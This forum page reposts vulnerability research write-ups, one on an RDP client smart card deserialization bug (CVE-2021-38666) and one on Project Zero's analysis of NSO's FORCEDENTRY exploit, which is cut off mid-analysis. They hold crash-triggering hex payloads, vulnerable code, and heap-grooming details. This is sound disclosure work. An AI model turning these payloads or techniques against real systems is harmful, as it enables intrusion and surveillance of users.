Posts posted by Nytro

  1. There are several solutions online, but they don't seem to work very well.

    The fix would be manual: replace certain function calls with "document.write" or some other method that, instead of executing the code, prints what it is about to execute.

    The code is fairly large and complex, so it would take a while, but it's not exactly impossible.

  2. Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666)

    This is the third installment in my three-part series of articles on fuzzing Microsoft’s RDP client, where I explain a bug I found by fuzzing the smart card extension.


    Introduction

    The Remote Desktop Protocol (RDP) is a proprietary protocol designed by Microsoft which allows the user of an RDP client software to connect to a remote computer over the network with a graphical interface. Its use around the world is very widespread; some people, for instance, use it often for remote work and administration.

    Most vulnerability research concentrates on the RDP server. However, critical vulnerabilities have also been found in the past in the RDP client, which would allow a compromised server to attack a client that connects to it.

    At Black Hat Europe 2019, a team of researchers showed they had found an RCE in the RDP client. Their motivation was that North Korean hackers would allegedly carry out attacks through RDP servers acting as proxies, and that you could hack them back by setting up a malicious RDP server to which they would connect.

    During my internship at Thalium, I spent time studying and reverse engineering Microsoft RDP, learning about fuzzing, and looking for vulnerabilities.

    In this article, I will explain how I found a deserialization bug in the Microsoft RDP client, but for which I unfortunately couldn’t provide an actual proof of concept.

    If you are interested in details about the Remote Desktop Protocol, reversing the Microsoft RDP client or fuzzing methodology, I invite you to read my first article which tackles these subjects.

    Either way, I will briefly provide some context required to understand this article:

    • The target is Microsoft’s official RDP client on Windows 10.
    • The executable is mstsc.exe (in system32), but the main DLL implementing most of the client logic is mstscax.dll.
    • RDP uses the abstraction of virtual channels, a layer for transporting data.
      • For instance, the channel RDPSND is used for audio redirection, and the channel CLIPRDR is used for clipboard synchronization.
    • Each channel behaves according to separate logic and its own protocol, whose official specification can often be found in Microsoft docs.
    • Virtual channels are a great attack surface and a good entrypoint for fuzzing.
    • I fuzzed virtual channels with a modified version of WinAFL and a network-level harness.

    Fuzzing RDPDR, the File System Virtual Channel Extension

    RDPDR is the name of the static virtual channel whose purpose is to redirect access from the server to the client's file system. It is also the base channel that hosts several sub-extensions, such as the smart card extension, the printing extension and the serial/parallel ports extension.

    RDPDR is one of the few channels that are opened by default in the RDP client, alongside other static channels RDPSND, CLIPRDR, DRDYNVC. This makes it an even more interesting target risk-wise.

    Microsoft has some nice documentation on this channel. It contains the different PDU types, their structures, and even dozens of example PDUs, which is great for seeding our fuzzer.

    Fuzzing RDPDR yielded a few small bugs, as well as another bug for which I got a CVE (see my previous article: Remote ASLR Leak in Microsoft’s RDP Client through Printer Cache Registry).

    The bug detailed in this article is one of the denser bugs I’ve had to deal with among my RDP findings. It was found by analyzing crashes that I got during fuzzing. That may sound obvious, but it’s actually not; the previous vulnerability I found, for instance, had no crash associated with it :)

    Analyzing crashes

    The crashes happened while fuzzing the Smart Card sub-protocol, and were quite… enigmatic.

     

    Perplexing logs of crashes while fuzzing RDPDR

     

    There were a lot of crashes, in many different modules, and also (not shown in the screenshot) in mstscax.dll. In fact, there were way too many crashes at random places for all of this to make any sense, so I thought something was broken in my fuzzing setup.

    However, one crash seemed to recur more frequently, inside RPCRT4.DLL. We got a tiny glimpse of RPC while investigating DRDYNVC in the first article, but it’s about to get more serious.

    Smart Cards and RPC

    The crashes in RPCRT4.DLL arise in NdrSimpleTypeConvert+0x307:

    mov     eax, [rdx] ; crash
    bswap   eax
    mov     [rdx], eax
    

    It’s a classic out-of-bounds read on what seems to be the byteswap of a DWORD in the heap.

    Fortunately, we are able to find the associated payload and instantly reproduce the bug. Here’s what the call stack looks like when the crash occurs:

     

    Call stack at the time of the crash in RPCRT4.DLL

     

    So before entering RPCRT4.DLL, we were in mstscax!W32SCard::LocateCardsByATRA. Interestingly though, if we analyze other payloads that lead to the same crash, the call stack points to other functions in mstscax.dll, such as:

    • W32SCard::HandleContextAndTwoStringCallWithLongReturn
    • W32SCard::WriteCache
    • W32SCard::DecodeContextAndStringCallW

    What’s with all of these? Here’s one thing all these functions have in common: the following snippet of code.

    v6 = MesDecodeBufferHandleCreate(
      &PDU->InputBuffer,
      PDU->InputBufferLength,
      &pHandle
    );
    // ...
    NdrMesTypeDecode3(
      pHandle,
      &pPicklingInfo,
      &pProxyInfo,
      (const unsigned int **)&ArrTypeOffset,
      0xEu,
      &pObject
    ); // Crash here
    

    The only thing that varies across these functions is the fifth parameter of NdrMesTypeDecode3 (the 0xE). We also immediately notice that PDU->InputBufferLength (DWORD) can be arbitrarily large…
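As a sketch of the missing check (all names here are hypothetical, not taken from mstscax.dll): the handlers pass the attacker-controlled InputBufferLength straight to the decoding engine, whereas a safe handler would clamp it to the number of bytes actually received:

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical sketch: the claimed InputBufferLength is a DWORD the
 * attacker fully controls, independent of what really arrived. */
typedef struct {
    uint32_t input_buffer_length; /* claimed length, attacker-controlled */
    size_t   bytes_received;      /* bytes actually present in the PDU */
} pdu_t;

/* Return the length the decoder should use: the claimed length,
 * clamped to the data that is really there. */
static size_t safe_decode_length(const pdu_t *pdu) {
    return pdu->input_buffer_length > pdu->bytes_received
               ? pdu->bytes_received
               : (size_t)pdu->input_buffer_length;
}
```

With the rpc-crash-1 payload, the claimed length 0x002d8000 would be clamped down to the handful of bytes actually sent.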

    Before going any further, let’s dissect two of the guilty payloads as well.

    rpc-crash-1
    
    72 44 52 49 01 00 00 00 f8 01 02 00 08 00 00 00 0e 00 00 00 00 00 00 00 DeviceIoRequest
    00 40 00 00 OutputBufferLength
    00 80 2d 00 InputBufferLength
    e8 00 09 00 IoControlCode
    00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 08 00 Padding
    InputBuffer
    01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00
    00 00 00 00 00 00 00 00 00 03 00 08 00 01 40 00
    00 16 00 00 00 01 00 00 00 
    
    rpc-crash-2
    
    72 44 52 49 01 00 00 00 f8 00 00 00 04 10 00 00 0e 00 00 00 00 00 00 00 DeviceIoRequest
    00 40 00 00 OutputBufferLength
    6f 63 06 00 InputBufferLength
    64 00 09 00 IoControlCode
    00 00 ff 00 00 00 00 40 00 20 00 66 00 00 77 66 64 63 08 00 Padding
    InputBuffer
    01 00 00 00 00 00 00 00 00 00 00 04 00 00 00 0e
    00 00 00 00 00 00 00 00 40 00 00 6f 63 06 00 64
    00 09 00 00 00 ff 00 00 00 00 40 00 00 00 00 00
    00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 6c 00 00 05
    

    So those are Device I/O Request PDUs, more specifically of sub-type Device Control Request. We already met one in the first article, in the arbitrary malloc bug.

    But what is this IoControlCode field exactly? According to the specification:

    IoControlCode (4 bytes): A 32-bit unsigned integer. This field is specific to the redirected device.

    Specific to the redirected device… For some reason, it took me a long time to realize there was actually a dedicated specification for the Smart Card sub-protocol (as well as the others).

    Section 3.1.4 of the Smart Card specification answers our suspicion. It contains a long table that maps IoControlCode values to types of IRP_MJ_DEVICE_CONTROL requests and their associated structures.

    IoControlCode table

    Therefore, there are around 60 functions that contain the same pattern of code using MesDecodeBufferHandleCreate followed by NdrMesTypeDecode3. They are all called the same way with our InputBuffer and InputBufferLength — only a certain offset parameter varies each time.

    According to the specification, for IoControlCode set to 0x000900E8, we get the following LocateCardsByATRA_Call structure:

    typedef struct _LocateCardsByATRA_Call {
      REDIR_SCARDCONTEXT Context;
      [range(0,1000)] unsigned long cAtrs;
      [size_is(cAtrs)] LocateCards_ATRMask* rgAtrMasks;
      [range(0,10)] unsigned long cReaders;
      [size_is(cReaders)] ReaderStateA* rgReaderStates;
    } LocateCardsByATRA_Call;
    

    It seems then that based on IoControlCode, our input buffer will be decoded according to a certain structure.

    The RPC NDR marshaling engine

    Let’s come back to the decoding code:

    v6 = MesDecodeBufferHandleCreate(
      &PDU->InputBuffer,
      PDU->InputBufferLength,
      &pHandle
    );
    

    This function from RPCRT4 is documented by Microsoft:

    The MesDecodeBufferHandleCreate function creates a decoding handle and initializes it for a (fixed) buffer style of serialization.

    So this is what it is all about… RPC has its own serialization engine, called the NDR marshaling engine (Network Data Representation). In particular, there is documentation on how data serialization works: header, format strings, types, etc.

    The RDP client makes “manual” use of the RPC NDR serialization engine to decode structures from the PDUs.

    After having initialized the decoding handle with the input buffer and length, the data is effectively deserialized:

    NdrMesTypeDecode3(
      pHandle,
      &pPicklingInfo,
      &pProxyInfo,
      (const unsigned int **)&ArrTypeOffset,
      0xEu,
      &pObject
    ); 
    

    And to our surprise… the function NdrMesTypeDecode3 is nowhere to be found in the documentation! The reason is that developers are not supposed to use this function directly.

    Instead, one should describe structures using Microsoft’s IDL (Interface Definition Language). Next, the MIDL compiler is used to generate stubs that can encode and decode data (using the NdrMes functions underneath).

    Nonetheless, header files contain information about the parameters and their types that can help us understand a bit more.

     

    Interesting fields inside NdrMesTypeDecode3's arguments... (pProxyInfo)

     

    In particular, the pProxyInfo argument eventually leads to a Format field. It seems to contain a compiled description of all the types that exist and are used within the Smart Card extension.

    Then, the ArrTypeOffset array, which starts like this: 0x02, 0x1e, 0x1e, 0x54, ..., lists the offsets of all the structures of interest inside the compiled format string. The next argument (0xE) is the offset, in the ArrTypeOffset array, of the structure we want to consider.

    For LocateCardsByATRA, index 0xE gives an offset of 0x220 from the ArrTypeOffset array, which points to the compiled format associated with the structure we found earlier in the specification:

    typedef struct _LocateCardsByATRA_Call {
      REDIR_SCARDCONTEXT Context;
      [range(0,1000)] unsigned long cAtrs;
      [size_is(cAtrs)] LocateCards_ATRMask* rgAtrMasks;
      [range(0,10)] unsigned long cReaders;
      [size_is(cReaders)] ReaderStateA* rgReaderStates;
    } LocateCardsByATRA_Call;
    

    We are lucky that the specification tells us everything about the type structures, and even includes the full IDL in an appendix. If we didn’t have these, we would have had to decompile the format ourselves, and not only the format pointed to by the offset we found: there are also many references to other previously defined structures, such as LocateCards_ATRMask.
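To make the indexing concrete, here is a sketch of the offset indirection. Only the first four array values and entry 0xE are from the article; the intermediate entries are hypothetical zero placeholders, and the helper name is mine:

```c
#include <stdint.h>

/* Sketch: ArrTypeOffset[index] is an offset into the compiled NDR format
 * string; index 0xE selects LocateCardsByATRA_Call at offset 0x220.
 * Entries 4..13 are hypothetical placeholders, not real values. */
static const uint32_t ArrTypeOffset[] = {
    0x02, 0x1e, 0x1e, 0x54,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* placeholders */
    0x220
};

/* Resolve the compiled type description for a given offset index. */
static const uint8_t *type_format(const uint8_t *format, uint32_t index) {
    return format + ArrTypeOffset[index];
}
```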

    Root cause

    This may be getting a bit hard to follow, so let’s summarize what we understand for now:

    • We can send an IoControlCode, InputBuffer and InputBufferLength.
    • The InputBufferLength (DWORD) can be greater than the actual length of InputBuffer.
    • The input buffer will be deserialized (through the RPC NDR marshaling engine) according to a structure that varies with IoControlCode.
    • There are around 60 possible IoControlCode values, and thus decoding structures.
    • There’s an OOB read during the deserialization process, in a certain function NdrSimpleTypeConvert.

    Now as I was reversing and debugging, it seemed to me that these “convert” operations actually took place before any real decoding per se. It was as if before deserializing, there was a first pass on the whole buffer to convert stuff.

    I eventually found a Windows XP source leak that helped shed light on all of this:

    void NdrSimpleTypeConvert(PMIDL_STUB_MESSAGE pStubMsg, uchar FormatChar) {
      switch (FormatChar) {
        // ...
        case FC_ULONG:
          ALIGN(pStubMsg->Buffer,3);
          CHECK_EOB_RAISE_BSD( pStubMsg->Buffer + 4 );
    
          if ((pStubMsg->RpcMsg->DataRepresentation & NDR_INT_REP_MASK) != NDR_LOCAL_ENDIAN) {
            *((ulong *)pStubMsg->Buffer) = RtlUlongByteSwap(*(ulong *)pStubMsg->Buffer);  
          }
    
          pStubMsg->Buffer += 4;
          break;
        // ...
      }
    }
    

    The magic happens when the endianness of the serialized data does not match with the local endianness. A pass on the buffer is performed to switch the endianness of (in particular) all the FC_ULONG type fields (the unsigned long fields in our structure).
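The conversion itself is nothing exotic. A minimal C rendition of what RtlUlongByteSwap does at the crash site, swapping one DWORD's byte order in place:

```c
#include <stdint.h>

/* Minimal sketch of one FC_ULONG conversion: reverse the byte order of a
 * 32-bit value, as RtlUlongByteSwap does when the wire endianness of the
 * serialized data differs from the local endianness. */
static uint32_t bswap32(uint32_t v) {
    return (v >> 24)
         | ((v >> 8)  & 0x0000ff00u)
         | ((v << 8)  & 0x00ff0000u)
         |  (v << 24);
}
```

Applying it twice is the identity, which is why the conversion pass can run in place on the buffer.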

    Therefore, in the _LocateCardsByATRA_Call structure, the fields cAtrs and cReaders are byteswapped. More importantly, so is any unsigned long that lies inside the nested rgAtrMasks or rgReaderStates fields. And these fields are arrays of structs whose size we control!

    So there are actually two kinds of overruns here:

    • the user-supplied PDU->InputBufferLength is not properly checked, so the conversion pass in the RPC NDR deserialization will go way beyond the end of the PDU in the heap;
    • the user-supplied cAtrs (or cReaders) that is coded inside the serialized data can be large enough to make the deserialization structure overflow the actual length of the buffer, along with the input buffer length we provided.

    Combined, these overruns result in an out-of-bounds read in the heap, and thus a crash.

    Heap corruption

    We managed to clear up why we got crashes in RPCRT4.DLL, and which payloads triggered them. However, we haven’t yet found an explanation for the tons of other nonsensical crashes we’ve had.

    Let’s check the LocateCards_ATRMask structure, which is nested inside LocateCardsByATRA_Call:

    typedef struct _LocateCards_ATRMask {
      [range(0, 36)] unsigned long cbAtr;
      byte rgbAtr[36];
      byte rgbMask[36];
    } LocateCards_ATRMask;
    

    There’s an unsigned long field (cbAtr) at the beginning of this struct of total size 76 bytes. Therefore, we may be able to perform byteswaps of DWORDs in the heap every 76 bytes!
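The 76-byte stride falls straight out of the element layout. A C sketch of the structure (types adapted from the IDL above), whose size and field offset pin down where each swap lands:

```c
#include <stddef.h>
#include <stdint.h>

/* Sketch of the array element from the spec: one unsigned long at the
 * start of each 76-byte element, so the NDR conversion pass byteswaps
 * one DWORD every sizeof(LocateCards_ATRMask) == 76 bytes. */
typedef struct {
    uint32_t cbAtr;        /* [range(0, 36)] unsigned long -> byteswapped */
    uint8_t  rgbAtr[36];
    uint8_t  rgbMask[36];
} LocateCards_ATRMask;
```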

    We can confirm this by setting a breakpoint where the byteswap occurs and watching the heap progressively getting disfigured.

    Since the PDU->InputBufferLength variable is arbitrarily large, we can, as we said, eventually reach the end of the heap segment to cause an OOB read crash. But this is not the interesting thing here.

    By byteswapping DWORDs in the heap, we are corrupting a lot of objects. If the input buffer length is large enough to allow out-of-bounds operations, but small enough not to exceed the heap segment, the deserialization process will return with a damaged heap. This leads to numerous types of crashes; all the odd unexplained crashes that I encountered earlier.

    • Heap Corruption exceptions during heap management calls
    • Random pointers being damaged and causing access violations
    • Damaged vtable pointers causing access violations
    • Damaged vtable pointers that still successfully resolve and redirect the execution flow, of course directly crashing after (illegal instruction)
      • The “unknown module” crashes I found earlier!

    Exploitation

    I suspect some of these behaviors could be exploited to achieve unexpected harmful results such as remote code execution.

    For instance, I thought that with some heap spray, one could manage to hijack a vtable through a well-aligned byteswap and redirect the execution flow. But it seemed quite tricky to carry out and I did not manage to exploit it myself.

    There may also be other repercussions of this deserialization bug. I saw that there were other kinds of conversions that could be performed: float conversions, EBCDIC <-> ASCII… but I’m not sure whether it is actually possible to trigger them.

    Reporting to Microsoft

    At first, I was hesitant about whether I should report this to MSRC or not. Indeed, I was very unsure about this bug’s exploitability, which seemed to me like it would be very intricate and relying on a lot of luck.

    Moreover, by submitting it, I would have to tag it as Remote Code Execution, which I thought would be a bold move without any proof of concept.

    I still reported it to MSRC, and rightfully so, as it was assessed Remote Code Execution with Critical severity and awarded a $5,000 bounty!

    In conclusion, don’t be afraid to submit bugs even if you lack proof of exploitation. As long as you have a very detailed explanation of the bug, a good understanding of the root cause and a decent analysis of the risks that come with it, it can be acknowledged and awarded.

    The exploitation process can sometimes require a lot of skill and creativity, and you can always tell yourself that even if you can’t exploit your own bug, there may be an evil super hacker out there that would manage to exploit it — better be safe than sorry.

    Disclosure Timeline

    • 2021-07-22 — Sent vulnerability report to MSRC (Microsoft Security Response Center)
    • 2021-07-23 — Microsoft started reviewing and reproducing
    • 2021-07-31 — Microsoft acknowledged the vulnerability and started developing a fix. They also started reviewing this case for a potential bounty award.
    • 2021-08-04 — Microsoft assessed the vulnerability as Remote Code Execution with Important severity. Bounty award: $5,000.
    • 2021-08-13 — The vulnerability was assigned CVE-2021-38666.
    • 2021-11-09 — Microsoft released the security patch. For some reason, the severity was revised to Critical when the CVE was published.
  3. A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

     

    Posted by Ian Beer & Samuel Groß of Google Project Zero

     

    We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

     

    Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

     

    Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

     

    The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.

     

    NSO

     

    NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.

     

    For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products", Pegasus has been linked to the hacking of New York Times journalist Ben Hubbard by the Saudi regime, the hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff, and dozens of other cases.

     

    Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."

     

    Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.

     

    From One to Zero

     

    In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:

     

     


    Screenshots of Phishing SMSs reported to Citizen Lab in 2016

    source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

     

    The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.

     

    One weird trick

     

    The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.

     

    iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:

     

      [IMGIFUtils copyGifFromPath:toDestinationPath:error]

     

    Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.

     

    The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.

     

    Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.

     

    A PDF in your GIF

     

    NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.

     

    PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

     

    Extreme compression

     

    In the late 1990s, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain-specific image codec designed to compress images where pixels can only be black or white.

     

    It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the Xerox WorkCentre device shown below. If you used the scan-to-pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.

    A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2

    for its scan-to-pdf functionality

    source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

     

    The PDF files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:

     

    Technique 1: Segmentation and substitution

     

    Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

     


    Simple pattern matching can find all the shapes which look similar on a page,

    in this case all the 'e's

     

    JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition). A JBIG2 encoder is just looking for connected regions of pixels and grouping similar-looking regions together. The compression algorithm simply substitutes all sufficiently similar-looking regions with a copy of just one of them:

     

     


    Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios

     

    In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.
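That "canvas and draw" step can be sketched in a few lines of C (the canvas and glyph representations here are mine, one byte per pixel, not Xpdf's actual bit-packed JBIG2Bitmap):

```c
#include <stdint.h>
#include <string.h>

/* Toy sketch of substitution decoding: stamp one reference glyph at each
 * stored (x, y) location on the page canvas. No clipping; the caller is
 * assumed to pass in-bounds locations. */
typedef struct { int x, y; } point_t;

static void draw_glyph(uint8_t *canvas, int canvas_w,
                       const uint8_t *glyph, int gw, int gh,
                       const point_t *locs, int nlocs) {
    for (int i = 0; i < nlocs; ++i)
        for (int row = 0; row < gh; ++row)
            memcpy(canvas + (locs[i].y + row) * canvas_w + locs[i].x,
                   glyph + row * gw, (size_t)gw);
}
```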

     

    There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.

     

    Technique 2: Refinement coding

     

    As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.

     

    It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:

     


    Using the XOR operator on bitmaps to compute a difference image

     

    In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.
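The XOR recovery step itself is trivial; a sketch in C (one byte per pixel for readability, whereas real JBIG2 bitmaps are bit-packed):

```c
#include <stddef.h>
#include <stdint.h>

/* Sketch of lossless refinement: XOR the substituted glyph with the
 * stored difference mask to recover the exact original pixels. */
static void refine_xor(uint8_t *out, const uint8_t *substituted,
                       const uint8_t *diff_mask, size_t n) {
    for (size_t i = 0; i < n; ++i)
        out[i] = substituted[i] ^ diff_mask[i];
}
```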

     

    Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.

     

    A JBIG2 stream

     

    Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.

     

    The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page.

     

    Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.

     

    A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.

     

    A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.

     

    JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.
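A sketch of that lookup, simplified from Xpdf's GList to a plain pointer array (the struct here keeps only the segment number; the real JBIG2Segment carries type and payload too):

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified sketch: segments are stored in one flat list, and lookup by
 * segment number is a sequential scan returning the first match. */
typedef struct { uint32_t segNum; /* ... type, payload in the real class */ } segment_t;

static segment_t *find_segment(segment_t **list, size_t n, uint32_t segNum) {
    for (size_t i = 0; i < n; ++i)
        if (list[i]->segNum == segNum)
            return list[i];
    return NULL;
}
```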

     

    The vulnerability

     

    The vulnerability is a classic integer overflow when collating referenced segments:

     

      Guint numSyms; // (1)

      numSyms = 0;
      for (i = 0; i < nRefSegs; ++i) {
        if ((seg = findSegment(refSegs[i]))) {
          if (seg->getType() == jbig2SegSymbolDict) {
            numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)
          } else if (seg->getType() == jbig2SegCodeTable) {
            codeTables->append(seg);
          }
        } else {
          error(errSyntaxError, getPos(),
                "Invalid segment reference in JBIG2 text region");
          delete codeTables;
          return;
        }
      }
    ...
      // get the symbol bitmaps
      syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)

      kk = 0;
      for (i = 0; i < nRefSegs; ++i) {
        if ((seg = findSegment(refSegs[i]))) {
          if (seg->getType() == jbig2SegSymbolDict) {
            symbolDict = (JBIG2SymbolDict *)seg;
            for (k = 0; k < symbolDict->getSize(); ++k) {
              syms[kk++] = symbolDict->getBitmap(k); // (4)
            }
          }
        }
      }

     

    numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.
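    To make the wraparound concrete, here is a sketch (with hypothetical segment sizes) of the unsigned 32-bit accumulation at (2); Python integers don't wrap, so the Guint behaviour is emulated with a mask:

```python
# Emulate the Guint (unsigned 32-bit) accumulation of numSyms at (2).
# The symbol dictionary sizes below are hypothetical, chosen to force a wrap.
MASK32 = 0xFFFFFFFF

def accumulate_num_syms(symbol_dict_sizes):
    num_syms = 0
    for size in symbol_dict_sizes:
        num_syms = (num_syms + size) & MASK32  # Guint addition wraps mod 2^32
    return num_syms

# Four dictionaries of 0x40000000 symbols sum to exactly 2^32 (i.e. 0),
# so only the final small dictionary is left in the count.
sizes = [0x40000000, 0x40000000, 0x40000000, 0x40000000, 0x20]
print(hex(accumulate_num_syms(sizes)))  # prints 0x20
```

    The allocation at (3) is then sized for the tiny wrapped value, while the copy loop at (4) still walks every referenced dictionary, writing far beyond the buffer.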

     

    That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.

     

    Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.

     

    Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).

     

    Conveniently, since JBIG2Bitmap inherits from JBIG2Segment, the seg->getType() virtual call succeeds even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls), but the returned type will now not be equal to jbig2SegSymbolDict, thus causing further writes at (4) to not be reached and bounding the extent of the memory corruption.

     

     


    A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap

     

    Boundless unbounding

     

    Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).

     

    JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

     

     


    The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow

     

    By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian, the w and line fields are likely to be overwritten with 0x1 (the most-significant half of a JBIG2Bitmap pointer), and the segNum and h fields with the least-significant half of such a pointer: a fairly random value, depending on heap layout and ASLR, somewhere between 0x100000 and 0xffffffff.
